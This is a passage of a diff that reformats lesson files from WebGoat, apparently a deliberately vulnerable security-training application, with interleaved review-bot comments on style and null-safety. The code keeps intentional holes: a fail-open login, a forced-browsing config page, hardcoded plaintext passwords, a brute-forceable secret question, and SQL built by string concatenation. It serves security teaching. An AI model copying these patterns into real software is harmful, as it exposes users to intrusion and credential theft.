user without entering a password. Try to login as the webgoat user without " + + "specifying a password."; + } + private final static Integer DEFAULT_RANKING = new Integer(20); - /** - * Gets the hints attribute of the AuthenticateScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("You can force errors during the authentication process."); - hints - .add("You can change length, existance, or values of authentication parameters."); - hints - .add("Try removing a parameter ENTIRELY with WebScarab."); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - return hints; - } + /** + * Gets the title attribute of the AuthenticateScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Fail Open Authentication Scheme"); + } - - /** - * Gets the instructions attribute of the FailOpenAuthentication object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - return "Due to an error handling problem in the authentication mechanism, it is possible to authenticate " - + "as the 'webgoat' user without entering a password. Try to login as the webgoat user without " - + "specifying a password."; - } - - private final static Integer DEFAULT_RANKING = new Integer(20); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the AuthenticateScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Fail Open Authentication Scheme"); - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } + public Element getCredits() + { + return super.getCustomCredits("", ASPECT_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java index c457b097b..7cfef80ca 100644 
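Review bot: In createContent's inner catch, `(username != null)` is tested only after `username.length() > 0` has already dereferenced it, so the check can never be false and should either be dropped or moved ahead of the length test. In that same condition `e.getMessage()` can be null for an exception that carries no message, in which case the handler itself throws and falls through to the outer `catch (Exception e)`, which reports "Error generating …" instead of reaching the branch the lesson intends; `String msg = e.getMessage(); if (username.length() > 0 && msg != null && msg.indexOf("not found") != -1)` avoids that without changing the lesson's behaviour. In getHints the new side leaves `hints` and `.add("Try removing a parameter ENTIRELY with WebScarab.");` on separate lines while the two preceding calls were joined, which looks like a formatter artifact rather than intent.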
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ForcedBrowsing.java @@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -16,138 +16,135 @@ import org.apache.ecs.html.Table; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * - * @author Sherif Koussa Macadamian Technologies. - * @created November 02, 2006 + * @author Sherif Koussa Macadamian Technologies. + * @created November 02, 2006 */ public class ForcedBrowsing extends LessonAdapter { - private final static String SUCCEEDED = "succeeded"; + private final static String SUCCEEDED = "succeeded"; - private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0); + private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies") + .setBorder(0).setHspace(0).setVspace(0); - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) + { ElementContainer ec = new ElementContainer(); - String success = new String(s.getParser().getStringParameter(SUCCEEDED,"")); - + String success = new String(s.getParser().getStringParameter(SUCCEEDED, "")); + if (success.length() != 0 && success.equals("yes")) { - ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Configuration Page"))); - ec.addElement(new BR()); - Table t1 = new 
Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center"); - - TR tr = new TR(); - tr.addElement(new TD(new StringElement("Set Admin Privileges for: "))); - - Input input1 = new Input(Input.TEXT, "", ""); - tr.addElement(new TD(input1)); - t1.addElement(tr); - - tr = new TR(); - tr.addElement(new TD(new StringElement("Set Admin Password:"))); - - input1 = new Input(Input.PASSWORD, "", ""); - tr.addElement(new TD(input1)); - t1.addElement(tr); - - Element b = ECSFactory.makeButton("Submit"); - t1.addElement(new TR(new TD(b).setColSpan(2).setAlign("right"))); - ec.addElement(t1); - - makeSuccess(s); + ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Configuration Page"))); + ec.addElement(new BR()); + Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center"); + + TR tr = new TR(); + tr.addElement(new TD(new StringElement("Set Admin Privileges for: "))); + + Input input1 = new Input(Input.TEXT, "", ""); + tr.addElement(new TD(input1)); + t1.addElement(tr); + + tr = new TR(); + tr.addElement(new TD(new StringElement("Set Admin Password:"))); + + input1 = new Input(Input.PASSWORD, "", ""); + tr.addElement(new TD(input1)); + t1.addElement(tr); + + Element b = ECSFactory.makeButton("Submit"); + t1.addElement(new TR(new TD(b).setColSpan(2).setAlign("right"))); + ec.addElement(t1); + + makeSuccess(s); } else { - ec.addElement("Can you try to force browse to the config page which should only be accessed by maintenance personnel."); + ec + .addElement("Can you try to force browse to the config page which should only be accessed by maintenance personnel."); } return ec; - } + } + /** + * Gets the category attribute of the ForgotPassword object + * + * @return The category value + */ + protected Category getDefaultCategory() + { + return Category.INSECURE_CONFIGURATION; + } - /** - * Gets the category attribute of the ForgotPassword object - * - * @return The category 
value - */ - protected Category getDefaultCategory() - { - return Category.INSECURE_CONFIGURATION; - } - - - /** - * Gets the hints attribute of the HelloScreen object - * - * @return The hints value - */ - public List getHints(WebSession s) - { - List hints = new ArrayList(); + /** + * Gets the hints attribute of the HelloScreen object + * + * @return The hints value + */ + public List getHints(WebSession s) + { + List hints = new ArrayList(); hints.add("Try to guess the URL for the config page"); hints.add("The config page is guessable and hackable"); hints.add("Play with the URL and try to guess what you can replace 'attack' with."); hints.add("Try to navigate to http://localhost/WebGoat/conf"); return hints; - } + } - private final static Integer DEFAULT_RANKING = new Integer(15); + private final static Integer DEFAULT_RANKING = new Integer(15); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } + /** + * Gets the title attribute of the HelloScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Forced Browsing"); + } - - /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Forced Browsing"); - } - - - public Element getCredits() - { - return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); - } + public Element getCredits() + { + return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java index 6d2bee5ca..c003e284a 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ForgotPassword.java 
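Review bot: `String success = new String(s.getParser().getStringParameter(SUCCEEDED, ""));` in createContent copies a String for no reason, and the test that follows, `success.length() != 0 && success.equals("yes")`, repeats a check that equals already makes; `String success = s.getParser().getStringParameter(SUCCEEDED, "");` and `if ("yes".equals(success))` express the same condition without the redundancy. The Javadoc on getDefaultCategory still says "Gets the category attribute of the ForgotPassword object" and the ones on getHints and getTitle name "the HelloScreen object", so the copy-pasted comments describe other classes; `Gets the category of the ForcedBrowsing lesson` (and likewise for hints and title) is what they should say. The `makeSuccess(s)` call sits inside the branch that renders the configuration page, which is fine for the lesson but deserves a one-line why-comment so a later reformat does not move it.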
@@ -1,9 +1,9 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; import java.util.HashMap; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -17,322 +17,319 @@ import org.apache.ecs.html.TD; import org.apache.ecs.html.TH; import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; - import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Eric Sheridan Aspect Security - * @created December 18, 2005 + * + * @author Eric Sheridan Aspect Security + * @created December 18, 2005 */ public class ForgotPassword extends LessonAdapter { - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); - private final static String USERNAME = "Username"; + private final static String USERNAME = "Username"; - private static String USERNAME_RESPONSE = ""; + private static String USERNAME_RESPONSE = ""; - private final static String COLOR = "Color"; + private final static String COLOR = "Color"; - private static String COLOR_RESPONSE = ""; + private static String COLOR_RESPONSE = ""; - private static int STAGE = 1; + private static int STAGE = 1; - private final static HashMap USERS = new HashMap(); + private final static HashMap USERS = new HashMap(); - private final static HashMap COLORS = new HashMap(); + private final static HashMap COLORS = new HashMap(); - - private void populateTables() - { + private void populateTables() + { USERS.put("admin", "2275$starBo0rn3"); USERS.put("jeff", "(_I_)illia(V)s"); USERS.put("dave", 
"\\V/ich3r$"); USERS.put("intern", "H3yn0w"); USERS.put("webgoat", "webgoat"); - + COLORS.put("admin", "green"); COLORS.put("jeff", "orange"); COLORS.put("dave", "purple"); COLORS.put("intern", "yellow"); COLORS.put("webgoat", "red"); - } + } - - protected Element doStage1(WebSession s) - { + protected Element doStage1(WebSession s) + { ElementContainer ec = new ElementContainer(); - + ec.addElement(new BR().addElement(new H1().addElement("Webgoat Password Recovery "))); Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - + if (s.isColor()) { - t.setBorder(1); + t.setBorder(1); } - + TR tr = new TR(); - tr.addElement(new TH().addElement("Please input your username. See the OWASP admin if you do not have an account.").setColSpan(2).setAlign("left")); + tr.addElement(new TH() + .addElement("Please input your username. See the OWASP admin if you do not have an account.") + .setColSpan(2).setAlign("left")); t.addElement(tr); - + tr = new TR(); tr.addElement(new TD().addElement("*Required Fields").setWidth("30%")); t.addElement(tr); - + tr = new TR(); tr.addElement(new TD().addElement(" ").setColSpan(2)); t.addElement(tr); - + TR row1 = new TR(); row1.addElement(new TD(new B(new StringElement("*User Name: ")))); - + Input input1 = new Input(Input.TEXT, USERNAME, ""); row1.addElement(new TD(input1)); t.addElement(row1); - + Element b = ECSFactory.makeButton("Submit"); t.addElement(new TR(new TD(b))); ec.addElement(t); - + return (ec); - } + } - - protected Element doStage2(WebSession s) - { + protected Element doStage2(WebSession s) + { ElementContainer ec = new ElementContainer(); - + ec.addElement(new H1().addElement("Webgoat Password Recovery ")); Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - + if (s.isColor()) { - t.setBorder(1); + t.setBorder(1); } - + TR tr = new TR(); - tr.addElement(new TH().addElement("Secret Question: What is your favorite 
color?").setColSpan(2).setAlign("left")); + tr.addElement(new TH().addElement("Secret Question: What is your favorite color?").setColSpan(2) + .setAlign("left")); t.addElement(tr); - + tr = new TR(); tr.addElement(new TD().addElement("*Required Fields").setWidth("30%")); t.addElement(tr); - + tr = new TR(); tr.addElement(new TD().addElement(" ").setColSpan(2)); t.addElement(tr); - + TR row1 = new TR(); row1.addElement(new TD(new B(new StringElement("*Answer: ")))); - + Input input1 = new Input(Input.TEXT, COLOR, ""); row1.addElement(new TD(input1)); t.addElement(row1); - + Element b = ECSFactory.makeButton("Submit"); t.addElement(new TR(new TD(b))); ec.addElement(t); - + return (ec); - } + } - - protected Element doStage3(WebSession s) - { + protected Element doStage3(WebSession s) + { ElementContainer ec = new ElementContainer(); - + ec.addElement(new H1().addElement("Webgoat Password Recovery ")); Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - + if (s.isColor()) { - t.setBorder(1); + t.setBorder(1); } - + TR tr = new TR(); - tr.addElement(new TH().addElement("For security reasons, please change your password immediately.").setColSpan(2).setAlign("left")); + tr.addElement(new TH().addElement("For security reasons, please change your password immediately.") + .setColSpan(2).setAlign("left")); t.addElement(tr); - + tr = new TR(); - tr.addElement(new TD().addElement(new BR().addElement(new B().addElement(new StringElement("Results:")))).setAlign("left")); + tr.addElement(new TD().addElement(new BR().addElement(new B().addElement(new StringElement("Results:")))) + .setAlign("left")); t.addElement(tr); - + tr = new TR(); tr.addElement(new TD().addElement(new StringElement("Username: " + USERNAME_RESPONSE))); t.addElement(tr); - + tr = new TR(); tr.addElement(new TD().addElement(new StringElement("Color: " + COLOR_RESPONSE))); t.addElement(tr); - + tr = new TR(); tr.addElement(new TD().addElement(new 
StringElement("Password: " + USERS.get(USERNAME_RESPONSE).toString()))); t.addElement(tr); - + ec.addElement(t); - + if (USERNAME_RESPONSE.equals("admin") && COLOR_RESPONSE.equals("green")) { - makeSuccess(s); + makeSuccess(s); } else if (!USERNAME_RESPONSE.equals("webgoat") && USERS.containsKey(USERNAME_RESPONSE)) { - s.setMessage("Close. Now try to get the password of a privileged account."); + s.setMessage("Close. Now try to get the password of a privileged account."); } return ec; - } + } - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) + { ElementContainer ec = new ElementContainer(); String username = ""; String color = ""; - + color = s.getParser().getStringParameter(COLOR, ""); - + if (color.length() > 0) - STAGE = 2; + STAGE = 2; else - STAGE = 1; - + STAGE = 1; + if (USERS.size() == 0) { - populateTables(); + populateTables(); } - + if (STAGE == 2) { - color = s.getParser().getStringParameter(COLOR, ""); - - if (COLORS.get(USERNAME_RESPONSE).equals(color)) - { + color = s.getParser().getStringParameter(COLOR, ""); + + if (COLORS.get(USERNAME_RESPONSE).equals(color)) + { STAGE = 1; COLOR_RESPONSE = color; ec.addElement(doStage3(s)); - } - else - { + } + else + { s.setMessage("Incorrect response for " + USERNAME_RESPONSE + ". 
Please try again!"); ec.addElement(doStage2(s)); - } + } } else if (STAGE == 1) { - username = s.getParser().getStringParameter(USERNAME, ""); - - if (USERS.containsKey(username)) - { + username = s.getParser().getStringParameter(USERNAME, ""); + + if (USERS.containsKey(username)) + { STAGE = 2; USERNAME_RESPONSE = username; ec.addElement(doStage2(s)); - } - else - { + } + else + { if (username.length() > 0) { s.setMessage("Not a valid username. Please try again."); } ec.addElement(doStage1(s)); - } + } } else { - ec.addElement(doStage1(s)); - STAGE = 1; + ec.addElement(doStage1(s)); + STAGE = 1; } - + return ec; - } + } + /** + * Gets the category attribute of the ForgotPassword object + * + * @return The category value + */ + protected Category getDefaultCategory() + { - /** - * Gets the category attribute of the ForgotPassword object - * - * @return The category value - */ - protected Category getDefaultCategory() - { + return Category.AUTHENTICATION; + } - return Category.AUTHENTICATION; - } - - - /** - * Gets the hints attribute of the HelloScreen object - * - * @return The hints value - */ - public List getHints(WebSession s) - { + /** + * Gets the hints attribute of the HelloScreen object + * + * @return The hints value + */ + public List getHints(WebSession s) + { List hints = new ArrayList(); - + hints.add("There is no lock out policy in place, brute force your way!"); hints.add("Try using usernames you might encounter throughout WebGoat."); hints.add("There are only so many possible colors, can you guess one?"); hints.add("The administrative account is \"admin\""); - + return hints; - } + } - private final static Integer DEFAULT_RANKING = new Integer(15); + private final static Integer DEFAULT_RANKING = new Integer(15); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } + /** + * Gets the title attribute of the HelloScreen object + * + * @return The title 
value + */ + public String getTitle() + { + return ("Forgot Password"); + } - - /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Forgot Password"); - } - - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } + public Element getCredits() + { + return super.getCustomCredits("", ASPECT_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java index 32b4a2e3f..2f82feda0 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DefaultLessonAction.java 
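Review bot: `if (COLORS.get(USERNAME_RESPONSE).equals(color))` in createContent dereferences the map lookup before checking it: USERNAME_RESPONSE starts as "" and is only set after a valid username was accepted, so a request that carries a Color parameter before any username (or after the servlet was reloaded) makes the lookup return null and the comparison throws NullPointerException; `if (color.equals(COLORS.get(USERNAME_RESPONSE)))` removes the throw, and `USERS.get(USERNAME_RESPONSE).toString()` in doStage3 has the same exposure. STAGE, USERNAME_RESPONSE and COLOR_RESPONSE are static fields, so the recovery flow's state is shared by every session on the server rather than kept per user, and two learners working the lesson at the same time will see each other's username and stage; unless that sharing is deliberate lesson material, this state belongs in session attributes. The `USERS.size() == 0` guard around populateTables is not synchronized, which is harmless here only because the puts are idempotent and the key set is fixed, and a comment saying so, `// unsynchronized on purpose: repeated population writes identical values`, would record that.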
@@ -1,42 +1,42 @@ + package org.owasp.webgoat.lessons.GoatHillsFinancial; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; - import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl; import org.owasp.webgoat.session.ParameterNotFoundException; import org.owasp.webgoat.session.UnauthenticatedException; import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. 
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ @@ -45,9 +45,9 @@ public abstract class DefaultLessonAction implements LessonAction // FIXME: We could parse this class name to get defaults for these fields. private String lessonName; private String actionName; - + private GoatHillsFinancial lesson; - + public DefaultLessonAction(GoatHillsFinancial lesson, String lessonName, String actionName) { this.lesson = lesson; @@ -55,8 +55,8 @@ public abstract class DefaultLessonAction implements LessonAction this.actionName = actionName; } - public void handleRequest( WebSession s ) - throws ParameterNotFoundException, UnauthenticatedException, UnauthorizedException, ValidationException + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException, ValidationException { getLesson().setCurrentAction(s, getActionName()); 
@@ -83,37 +83,34 @@ public abstract class DefaultLessonAction implements LessonAction { return actionName; } - + public void setSessionAttribute(WebSession s, String name, Object value) { s.getRequest().getSession().setAttribute(name, value); } - + public void setRequestAttribute(WebSession s, String name, Object value) { s.getRequest().setAttribute(name, value); } - + public void removeSessionAttribute(WebSession s, String name) { - s.getRequest().getSession().removeAttribute(name); + s.getRequest().getSession().removeAttribute(name); } - + protected String getSessionAttribute(WebSession s, String name) throws ParameterNotFoundException { String value = (String) s.getRequest().getSession().getAttribute(name); - if (value == null) - { - throw new ParameterNotFoundException(); - } - + if (value == null) { throw new ParameterNotFoundException(); } + return value; } - + protected boolean getBooleanSessionAttribute(WebSession s, String name) throws ParameterNotFoundException { boolean value = false; - + Object attribute = s.getRequest().getSession().getAttribute(name); if (attribute == null) { @@ -121,13 +118,15 @@ public abstract class DefaultLessonAction implements LessonAction } else { - //System.out.println("Attribute " + name + " is of type " + s.getRequest().getSession().getAttribute(name).getClass().getName()); - //System.out.println("Attribute value: " + s.getRequest().getSession().getAttribute(name)); + // System.out.println("Attribute " + name + " is of type " + + // s.getRequest().getSession().getAttribute(name).getClass().getName()); + // System.out.println("Attribute value: " + + // s.getRequest().getSession().getAttribute(name)); value = ((Boolean) attribute).booleanValue(); } return value; } - + protected int getIntSessionAttribute(WebSession s, String name) throws ParameterNotFoundException { int value = -1; 
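Review bot: `if (value == null) { throw new ParameterNotFoundException(); }` in getSessionAttribute collapses a braced block onto one line, while every other conditional in the file keeps the brace-per-line layout the rest of this commit enforces; getRequestAttribute in the next hunk has the same collapsed form, so both should be restored to the three-line shape the file uses elsewhere. The commented-out System.out.println lines in getBooleanSessionAttribute were reflowed instead of deleted; commented-out code only goes stale, and a version-control history already keeps it. If they are meant as a debugging aid, a single comment `// debug: log attribute type and value here if the Boolean cast below fails` is more useful than the dead statements, since the `(Boolean) attribute` cast on the line after them is where a misuse would surface.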
@@ -141,26 +140,22 @@ public abstract class DefaultLessonAction implements LessonAction try { value = Integer.parseInt(ss); - } - catch (NumberFormatException nfe) + } catch (NumberFormatException nfe) { } } - + return value; } - + protected String getRequestAttribute(WebSession s, String name) throws ParameterNotFoundException { String value = (String) s.getRequest().getAttribute(name); - if (value == null) - { - throw new ParameterNotFoundException(); - } - + if (value == null) { throw new ParameterNotFoundException(); } + return value; } - + protected int getIntRequestAttribute(WebSession s, String name) throws ParameterNotFoundException { int value = -1; 
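Review bot: `} catch (NumberFormatException nfe) { }` in getIntSessionAttribute swallows the parse failure without a word, so a malformed attribute value is returned as -1 and is indistinguishable from an absent one; getIntRequestAttribute in the following hunk does the same. If falling back to -1 is intended, the empty block needs a comment stating it, `// malformed value: leave value at -1 so callers treat it like a missing attribute`, and the variable should be named `ignored`; if it is not intended, the method already declares ParameterNotFoundException and could throw it here instead. The enclosing methods start before the hunk, and the `int value = -1;` initialisation that makes the fallback work is in the earlier hunk, so the comment should sit at the catch, where a reader will look.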
@@ -174,153 +169,154 @@ public abstract class DefaultLessonAction implements LessonAction try { value = Integer.parseInt(ss); - } - catch (NumberFormatException nfe) + } catch (NumberFormatException nfe) { } } - + return value; } - + public int getUserId(WebSession s) throws ParameterNotFoundException { return getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID); } - + public String getUserName(WebSession s) throws ParameterNotFoundException { String name = null; - + int employeeId = getUserId(s); try { String query = "SELECT first_name FROM employee WHERE userid = " + employeeId; - + try { - Statement answer_statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); - ResultSet answer_results = answer_statement.executeQuery( query ); - if (answer_results.next()) - name = answer_results.getString("first_name"); - } - catch ( SQLException sqle ) + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.next()) name = answer_results.getString("first_name"); + } catch (SQLException sqle) { - s.setMessage( "Error getting user name" ); + s.setMessage("Error getting user name"); sqle.printStackTrace(); } - } - catch ( Exception e ) + } catch (Exception e) { - s.setMessage( "Error getting user name" ); + s.setMessage("Error getting user name"); e.printStackTrace(); } return name; } - + public boolean requiresAuthentication() { // Default to true return true; } - + public boolean isAuthenticated(WebSession s) { boolean authenticated = false; - + try { authenticated = getBooleanSessionAttribute(s, getLessonName() + ".isAuthenticated"); + } catch (ParameterNotFoundException e) + { } - catch (ParameterNotFoundException e) - { - } - + return authenticated; } - + public boolean isAuthorized(WebSession s, int 
employeeId, String functionId) { - String employer_id = (String)s.getRequest().getSession().getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID); - //System.out.println("Authorizing " + employeeId + " for use of function: " + functionId + " having USER_ID = " + employer_id ); + String employer_id = (String) s.getRequest().getSession() + .getAttribute(getLessonName() + "." + RoleBasedAccessControl.USER_ID); + // System.out.println("Authorizing " + employeeId + " for use of function: " + functionId + + // " having USER_ID = " + // + employer_id ); boolean authorized = false; - + try { - String query = "SELECT * FROM auth WHERE auth.role in (SELECT roles.role FROM roles WHERE userid = " + employeeId + ") and functionid = '" + functionId + "'"; - + String query = "SELECT * FROM auth WHERE auth.role in (SELECT roles.role FROM roles WHERE userid = " + + employeeId + ") and functionid = '" + functionId + "'"; + try { - Statement answer_statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); - ResultSet answer_results = answer_statement.executeQuery( query ); + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); authorized = answer_results.first(); - - /* User is validated for function, but can the user perform that function on the specified user? */ - if(authorized) + + /* + * User is validated for function, but can the user perform that function on the + * specified user? 
+ */ + if (authorized) { authorized = isAuthorizedForEmployee(s, Integer.parseInt(employer_id), employeeId); } - } - catch ( SQLException sqle ) + } catch (SQLException sqle) { - s.setMessage( "Error authorizing" ); + s.setMessage("Error authorizing"); sqle.printStackTrace(); } - } - catch ( Exception e ) + } catch (Exception e) { - s.setMessage( "Error authorizing" ); + s.setMessage("Error authorizing"); e.printStackTrace(); } - - //System.out.println("Authorized? " + authorized); + + // System.out.println("Authorized? " + authorized); return authorized; } - + public boolean isAuthorizedForEmployee(WebSession s, int userId, int employeeId) { - //System.out.println("Authorizing " + userId + " for access to employee: " + employeeId); + // System.out.println("Authorizing " + userId + " for access to employee: " + employeeId); boolean authorized = false; - + try { String query = "SELECT * FROM ownership WHERE employer_id = ? AND employee_id = ?"; - + try { - - PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query, - ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY ); + + PreparedStatement answer_statement = WebSession.getConnection(s) + .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, 